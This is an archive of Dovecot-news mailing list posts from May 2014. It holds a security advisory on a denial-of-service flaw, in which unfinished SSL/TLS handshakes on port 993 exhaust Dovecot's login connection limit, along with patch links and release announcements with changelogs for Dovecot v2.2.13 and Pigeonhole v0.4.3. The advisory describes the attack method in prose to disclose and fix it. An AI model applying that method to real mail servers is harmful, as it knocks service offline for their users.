From tss at iki.fi Thu May 8 15:29:27 2014 From: tss at iki.fi (Timo Sirainen) Date: Thu, 8 May 2014 18:29:27 +0300 Subject: [Dovecot-news] Denial of Service attacks against Dovecot v1.1+ Message-ID: <5FBF2986-1080-4205-82D7-67781BC70F8C@iki.fi> There's an upper limit to how many IMAP/POP3 connections can exist that haven't logged in (and separate limits for post-login). Normally when this limit is reached, the oldest connection gets disconnected. There is of course some potential to try to DoS Dovecot by doing a lot of IMAP/POP3 connections, but because the oldest connection always gets destroyed this requires quite a lot of activity from the attacker. This "destroy oldest connection" however hasn't been working in v1.1+ releases for connections that have started SSL/TLS handshake, but haven't finished it. So an attacker could just do a bunch of TCP connections to port 993 and leave them hanging around and Dovecot would pretty quickly reach the upper limit without being able to disconnect any of the oldest connections. Here are patches to fix this: http://hg.dovecot.org/dovecot-2.2/rev/41622541a7a3 http://hg.dovecot.org/dovecot-2.1/rev/b7ac23b4d339 http://hg.dovecot.org/dovecot-2.0/rev/48f90e7e92dc http://hg.dovecot.org/dovecot-1.2/rev/8ba4253adc9b http://hg.dovecot.org/dovecot-1.1/rev/fe0e6550585c The fix will be in v2.2.13. Maybe also in v2.1.18 if I decide to release it. For older releases you need to patch it yourself. For people who are using dovecot-ee releases the fix is also in v2.2.12.12 and v2.1.7.7 releases. From tss at iki.fi Thu May 8 15:37:20 2014 From: tss at iki.fi (Timo Sirainen) Date: Thu, 8 May 2014 18:37:20 +0300 Subject: [Dovecot-news] v2.2.13.rc1 released Message-ID: http://dovecot.org/releases/2.2/rc/dovecot-2.2.13.rc1.tar.gz http://dovecot.org/releases/2.2/rc/dovecot-2.2.13.rc1.tar.gz.sig There have been a ton of smaller and some larger changes since v2.2.12, so I thought I'd first make a RC release and the final v2.2.13 tomorrow. Please try it out! BTW. I've read most of the mails again in Dovecot mailing list, but there are still a few reported bugs I decided to leave until later. Anyway feel free to re-send any bug reports for things that haven't been fixed in v2.2.13 yet. * Fixed a DoS attack against imap/pop3-login processes. If SSL/TLS handshake was started but wasn't finished, the login process attempted to eventually forcibly disconnect the client, but failed to do it correctly. This could have left the connections hanging arond for a long time. (Affected Dovecot v1.1+) + mdbox: Added mdbox_purge_preserve_alt setting to keep the file within alt storage during purge. (Should become enforced in v2.3.0?) + fts: Added support for parsing attachments via Apache Tika. Enable with: plugin { fts_tika = http://tikahost:9998/tika/ } + virtual plugin: Delay opening backend mailboxes until it's necessary. This requires mailbox_list_index=yes to work. (Currently IMAP IDLE command still causes all backend mailboxes to be opened.) + mail_never_cache_fields=* means now to disable all caching. This may be a useful optimization as doveadm/dsync parameter for some admin tasks which shouldn't really update the cache file. + IMAP: Return SPECIAL-USE flags always for LSUB command. - pop3 server was still crashing in v2.2.12 with some settings - maildir: Various fixes and improvements to handling compressed mails, especially when they have broken/missing S=sizes in filenames. - fts-lucene, fts-solr: Fixed crash on search when the index contained duplicate entries. - Many fixes and performance improvements to dsync and replication - director was somewhat broken when there were exactly two directors in the ring. It caused errors about "weak users" getting stuck. - mail_attachment_dir: Attachments with the last base64-encoded line longer than the rest wasn't handled correctly. - IMAP: SEARCH/SORT PARTIAL was handled completely wrong in v2.2.11+ - acl: Global ACL file handling was broken when multiple entries matched the mailbox name. (Only the first entry was used.) From tss at iki.fi Sun May 11 19:37:38 2014 From: tss at iki.fi (Timo Sirainen) Date: Sun, 11 May 2014 22:37:38 +0300 Subject: [Dovecot-news] v2.2.13 released Message-ID: http://dovecot.org/releases/2.2/dovecot-2.2.13.tar.gz http://dovecot.org/releases/2.2/dovecot-2.2.13.tar.gz.sig A few minor changes since v2.2.13.rc1, mainly making the Pigeonhole tests pass. * Fixed a DoS attack against imap/pop3-login processes. If SSL/TLS handshake was started but wasn't finished, the login process attempted to eventually forcibly disconnect the client, but failed to do it correctly. This could have left the connections hanging arond for a long time. (Affected Dovecot v1.1+) + mdbox: Added mdbox_purge_preserve_alt setting to keep the file within alt storage during purge. (Should become enforced in v2.3.0?) + fts: Added support for parsing attachments via Apache Tika. Enable with: plugin { fts_tika = http://tikahost:9998/tika/ } + virtual plugin: Delay opening backend mailboxes until it's necessary. This requires mailbox_list_index=yes to work. (Currently IMAP IDLE command still causes all backend mailboxes to be opened.) + mail_never_cache_fields=* means now to disable all caching. This may be a useful optimization as doveadm/dsync parameter for some admin tasks which shouldn't really update the cache file. + IMAP: Return SPECIAL-USE flags always for LSUB command. - pop3 server was still crashing in v2.2.12 with some settings - maildir: Various fixes and improvements to handling compressed mails, especially when they have broken/missing S=sizes in filenames. - fts-lucene, fts-solr: Fixed crash on search when the index contained duplicate entries. - Many fixes and performance improvements to dsync and replication - director was somewhat broken when there were exactly two directors in the ring. It caused errors about "weak users" getting stuck. - mail_attachment_dir: Attachments with the last base64-encoded line longer than the rest wasn't handled correctly. - IMAP: SEARCH/SORT PARTIAL was handled completely wrong in v2.2.11+ - acl: Global ACL file handling was broken when multiple entries matched the mailbox name. (Only the first entry was used.) From stephan at rename-it.nl Mon May 12 19:25:56 2014 From: stephan at rename-it.nl (Stephan Bosch) Date: Mon, 12 May 2014 21:25:56 +0200 Subject: [Dovecot-news] Released Pigeonhole v0.4.3 for Dovecot v2.2.13. Message-ID: <53712044.8050001@rename-it.nl> Hello Dovecot users, Now that Dovecot v2.2.13 is released, I can release a new Pigeonhole. Due to changes in Dovecot, this Pigeonhole release will not compile cleanly against older Dovecot releases. This release is mainly about bugfixes. One notable addition is that I have updated the "vnd.dovecot.duplicate" extension to the new IETF draft "duplicate" extension. Changelog v0.4.3: * Editheader extension: Made control characters allowed for editheader, except NUL. Before, this would cause a runtime error. + Upgraded Dovecot-specific Sieve "vnd.dovecot.duplicate" extension to match the new draft "duplicate" extension. - Fixed sieve_result_global_log_error to log only as i_info in administrator log (syslog) if executed from multiscript context. - Sieve redirect extension: Adjusted loop detection to show leniency to resent messages. - Sieve include extension: Fixed problem with handling of duplicate includes with different parameters :once or :optional. - Sieve spamtest/virustest extensions: Tests were erroneously performed against the original message. When used together with extprograms filter to add the spam headers, the changes were not being used by the spamtest and virustest extensions. - Deprecated Sieve notify extension: Fixed segfault problems in message string substitution. - ManageSieve: Fixed active link verification to handle redundant path slashes correctly. - Sieve vacation extension: - Fixed interaction of sieve_vacation_dont_check_recipient with sieve_vacation_send_from_recipient setting. - Fixed log message for discarded response. - Sieve extprograms plugin: - Forgot to disable the alarm() timeouts set for script execution. - Fixed fd leak and handling of output shutdown. - Fixed 'Bad filedescriptor' error occurring when disconnecting script client. - Made sure that programs are never forked with root privileges. The release is available as follows: http://pigeonhole.dovecot.org/releases/2.2/dovecot-2.2-pigeonhole-0.4.3.tar.gz http://pigeonhole.dovecot.org/releases/2.2/dovecot-2.2-pigeonhole-0.4.3.tar.gz.sig Refer to http://pigeonhole.dovecot.org and the Dovecot v2.x wiki for more information. Have fun testing this new release and don't hesitate to notify me when there are any problems. Regards, -- Stephan Bosch stephan at rename-it.nl